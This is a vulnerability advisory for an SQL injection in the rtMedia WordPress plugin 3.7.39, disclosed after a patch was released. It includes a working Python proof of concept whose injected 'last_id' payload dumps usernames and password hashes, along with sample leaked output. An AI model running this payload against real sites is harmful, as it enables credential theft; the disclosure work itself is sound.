rtMedia for WordPress, BuddyPress and bbPress 3.7.39, SQL Injection

When initialized, the rtMedia will include and instantiate certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained within the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php,’ line 110, if the class ‘BuddyPress’ is available. Once instantiated, the RTMediaActivityUpgrade class adds an AJAX method called ‘rtmedia_activity_upgrade’. This AJAX method is callable by any registered user, and is susceptible to MySQL Injection.

Homepage

https://wordpress.org/plugins/buddypress-media/

CVSS Score

4

CSSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

Registered

Mitigation

Update to version 3.7.40.

Proof of Concept

The below PoC will log in as the user ‘test’, and proceed to trigger a MySQL Injection attack, which returns a list of usernames and hashed passwords.

import requests,json
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
	"log":"test",
	"pwd":"test",
	"wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
	"action":"rtmedia_activity_upgrade",
	"last_id":"0 AND 1=0 GROUP BY id UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(concat_ws(char(58),wp_users.user_login,wp_users.user_pass)) from wp_users group by 1=1),13,14,15,16,17,18,19,20,21,22,23,24 FROM wp_rt_rtm_media GROUP BY id--"
}
r = s.post(url, data=payload)

print json.loads(r.text)['activity_id']

Output

~$ python g0blin-00046.py

test:$P$BlI29cUx2Z0Wpt0DHALldoY.CCGrha0

Timeline

  • 2015-04-21: Discovered
  • 2015-04-21: Vendor notified
  • 2015-04-21: Version 3.7.40 released – issue resolved
  • 2015-04-28: Advisory released